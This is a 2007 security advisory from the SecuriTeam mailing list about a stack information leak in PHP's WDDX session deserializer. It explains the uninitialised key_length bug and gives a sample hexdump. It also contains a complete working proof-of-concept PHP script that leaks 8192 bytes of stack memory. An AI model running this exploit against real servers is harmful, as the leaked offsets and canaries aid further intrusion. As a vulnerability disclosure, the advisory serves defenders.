[UNIX] PHP WDDX Session Deserialization Information Leak Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



PHP WDDX Session Deserialization Information Leak Vulnerability
------------------------------------------------------------------------


SUMMARY

The PHP WDDX extension comes with a serialization handler that adds
support for the WDDX data format to PHP's session handling. When this data
contains a numerical key the key_length variable is not properly
initialized which will leak an arbitrary amount of stack data into the
session array keys.

This can lead to the disclosure of sensitive information stored on the
stack, like offsets of variables and code (useful for further attacks that
require exact offsets), stack canaries, etc.

DETAILS

Vulnerable Systems:
* PHP4 versions prior to 4.4.5
* PHP5 versions prior to 5.2.1

The handling of numerical keys inside the WDDX deserializer is broken:
switch (hash_type) {
case HASH_KEY_IS_LONG:
sprintf(tmp, "%ld", idx);
key = tmp;
/* fallthru */
case HASH_KEY_IS_STRING:
php_set_session_var(key, key_length-1, *ent, NULL
TSRMLS_CC);
PS_ADD_VAR(key);
}

The numerical key is written into a 128 byte stackbuffer and then (because
of the fallthru) the variable is added to the session. Unfortunately the
key_length variable is not properly initialized in the numerical key case.
Therefore only the beginning of the variable name is initialised and the
rest of the key_length bytes comes directly from stack data.

An attacker can control how many bytes are leaked by placing a variable
with a string name infront of the numerical index variable. In that case
the key_length is equal to the length of the variable name and therefore
completely under control of the attacker.
Proof of concept, exploit or instructions to reproduce

The attached proof of concept exploit will leak 8192 bytes of stack data
into PHP variables and produce a hexdump.

Stackdump:
00000000: 31 00 00 00 74 4f 9e bf b1 b7 e5 b7 2c 38 31 65 1...tO......,81e
00000010: 39 66 65 63 b6 01 00 00 19 00 00 00 00 30 fd b7 9fec.........0..
00000020: f4 8f f2 b7 f4 8f f2 b7 00 35 1f 08 0a 00 00 00 .........5......
00000030: 80 0e 1f 08 90 08 00 00 4c ef f1 b7 d1 84 e5 b7 ........L.......
00000040: b4 4f 9e bf 69 68 e5 b7 d1 84 e5 b7 00 30 fd b7 .O..ih.......0..
00000050: 20 00 00 00 40 04 00 00 20 00 00 00 00 30 fd b7 ...@... ....0..
00000060: f4 8f f2 b7 20 0d 1f 08 45 90 19 08 cc 4f 9e bf .... ...E....O..
00000070: 6b 95 e5 b7 20 0d 1f 08 f4 8f f2 b7 80 a8 f2 b7 k... ...........
00000080: 01 00 00 00 01 20 00 00 48 4f 9e bf 68 e8 1e 08 ..... ..HO..h...
00000090: 0c a0 1e 08 0c 0d 1f 08 d4 a9 1e 08 ec 9f 1e 08 ................
000000a0: 08 50 9e bf 8a 98 09 08 74 c7 1e 08 99 20 00 00 .P......t.... ..
000000b0: 18 50 9e bf 24 51 9e bf 00 00 00 00 ec 9f 1e 08 .P..$Q..........
000000c0: 38 50 9e bf b9 99 09 08 01 00 00 00 28 50 9e bf 8P..........(P..
000000d0: 0c 00 00 00 ec 9f 1e 08 2c c2 1e 08 68 46 ff 08 ........,...hF..
000000e0: d4 a9 1e 08 24 51 9e bf 00 00 00 00 60 50 9e bf ....$Q......`P..
000000f0: f8 59 9e bf 44 f4 15 08 01 00 00 00 ec 9f 1e 08 .Y..D...........
..

Proof of concept:
<?php
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP WDDX Session Deserialization Stack Information Leak //
////////////////////////////////////////////////////////////////////////

// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");

if (!extension_loaded("wddx")) {
die("wddx extension needed\n");
}

ini_set("session.serialize_handler", "wddx");

session_start();

session_decode("<wddxPacket version='1.0'><header/><data><struct><var
name='".str_repeat("A",8192)."'><string>A</string></var><var
name='1'><string>1</string></var></struct></data></wddxPacket>");

$keys = array_keys($_SESSION);
$stackdump = $keys[1];

echo "Stackdump\n---------\n\n";

for ($b=0; $b<strlen($stackdump); $b+=16) {
printf("%08x: ", $b);
for ($i=0; $i<16; $i++) {
printf ("%02x ", ord($stackdump[$b+$i]));
}
for ($i=0; $i<16; $i++) {
$c = ord($stackdump[$b+$i]);
if ($c > 127 || $c < 32) {
$c = ord(".");
}
printf ("%c", $c);
}
printf("\n");
}
?>


ADDITIONAL INFORMATION

The information has been provided by PHP-Security.
The original article can be found at:
<http://www.php-security.org/MOPB/MOPB-11-2007.html>
http://www.php-security.org/MOPB/MOPB-11-2007.html



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages